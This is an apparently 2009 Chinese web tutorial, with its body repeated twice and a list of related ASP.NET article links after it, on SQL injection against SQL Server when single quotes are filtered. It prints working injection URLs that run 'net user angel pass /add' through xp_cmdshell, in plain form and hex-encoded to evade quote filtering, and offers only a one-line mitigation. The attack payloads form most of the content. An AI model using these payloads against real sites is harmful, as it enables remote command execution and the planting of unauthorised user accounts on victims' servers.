SQL注入中繞過 單引號(hào) 限制繼續(xù)注入
更新時(shí)間:2009年06月27日 21:51:48 作者:
我想不少人都看過一些關(guān)于SQL Injection針對(duì)SQL Server攻擊的文章,都是因?yàn)樽兞窟^濾不足甚至沒有過濾而構(gòu)造畸形SQL語(yǔ)句注入的
包括我寫的那篇《SQL Injection的實(shí)現(xiàn)與應(yīng)用》也是這樣的例子,因?yàn)闆]有碰到任何的過濾,所以使我們相當(dāng)輕松就注入成功了,如下:
http://chabaoo.cn/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--
這往往給大家造成誤解,認(rèn)為只要變量過濾了'就可以防止SQL Injection攻擊,這種意識(shí)為大量程序可以注入埋下禍根,其實(shí)僅僅過濾'是不夠的,在'被過濾的情況下我們照樣玩,看下面語(yǔ)句:
http://chabaoo.cn/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
是不是跟上面的那句有很大區(qū)別?可是效果完全是一樣的。其實(shí)這些都是SQL語(yǔ)句。
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
這句是“net user angel pass /add”的16進(jìn)制格式。了解SQL的朋友就容易明白,先聲明一個(gè)變量a,然后把我們的指令賦值給a,然后調(diào)用變量a最終執(zhí)行我們輸入的命令。變量a可以是任何命令。如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
解決辦法:
過濾變量,限制只允許輸入特定字符。比如對(duì)于數(shù)字類型的變量就限制只能輸入數(shù)字類型的數(shù)據(jù)。具體就不說了。這完全是程序作者自由發(fā)揮了。
復(fù)制代碼 代碼如下:
http://chabaoo.cn/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--
這往往給大家造成誤解,認(rèn)為只要變量過濾了'就可以防止SQL Injection攻擊,這種意識(shí)為大量程序可以注入埋下禍根,其實(shí)僅僅過濾'是不夠的,在'被過濾的情況下我們照樣玩,看下面語(yǔ)句:
復(fù)制代碼 代碼如下:
http://chabaoo.cn/show.asp?id=1;declare%20@a%20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--
是不是跟上面的那句有很大區(qū)別?可是效果完全是一樣的。其實(shí)這些都是SQL語(yǔ)句。
復(fù)制代碼 代碼如下:
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
這句是“net user angel pass /add”的16進(jìn)制格式。了解SQL的朋友就容易明白,先聲明一個(gè)變量a,然后把我們的指令賦值給a,然后調(diào)用變量a最終執(zhí)行我們輸入的命令。變量a可以是任何命令。如下:
復(fù)制代碼 代碼如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
解決辦法:
過濾變量,限制只允許輸入特定字符。比如對(duì)于數(shù)字類型的變量就限制只能輸入數(shù)字類型的數(shù)據(jù)。具體就不說了。這完全是程序作者自由發(fā)揮了。
相關(guān)文章
Asp.net在線備份、壓縮和修復(fù)Access數(shù)據(jù)庫(kù)示例代碼
這篇文章主要介紹了Asp.net如何在線備份、壓縮和修復(fù)Access數(shù)據(jù)庫(kù),需要的朋友可以參考下2014-03-03
.Net讀取Excel 返回DataTable實(shí)例代碼
這篇文章主要介紹了.Net讀取Excel 返回DataTable實(shí)例代碼,有需要的朋友可以參考一下2014-01-01
Asp.net "對(duì)路徑的訪問被拒絕" 解決方法的分析
本篇文章是對(duì)Asp.net中"對(duì)路徑的訪問被拒絕" 的解決方法進(jìn)行了詳細(xì)的分析介紹,需要的朋友參考下2013-05-05
ASP.NET中上傳并讀取Excel文件數(shù)據(jù)示例
如何打開Excel數(shù)據(jù)庫(kù)文件,想必有很多朋友都不清楚吧,下面通過一個(gè)簡(jiǎn)單的例子,實(shí)現(xiàn)讀取Excel數(shù)據(jù)文件2014-05-05
ASP.NET MVC學(xué)習(xí)教程之Razor語(yǔ)法
這篇文章主要給大家介紹了關(guān)于ASP.NET MVC學(xué)習(xí)教程之Razor語(yǔ)法的相關(guān)資料,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2018-05-05
ASP.NET Core Web資源打包與壓縮技術(shù)介紹
這篇文章介紹了ASP.NET Core Web資源打包與壓縮技術(shù),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2022-02-02
.NET?Core項(xiàng)目使用swagger開發(fā)組件
這篇文章介紹了.NET?Core項(xiàng)目使用swagger開發(fā)組件的方法,對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧2022-07-07
asp.net 使用Silverlight操作ASPNETDB數(shù)據(jù)庫(kù)
asp.net下使用Silverlight操作ASPNETDB數(shù)據(jù)庫(kù)的實(shí)現(xiàn)代碼2010-01-01

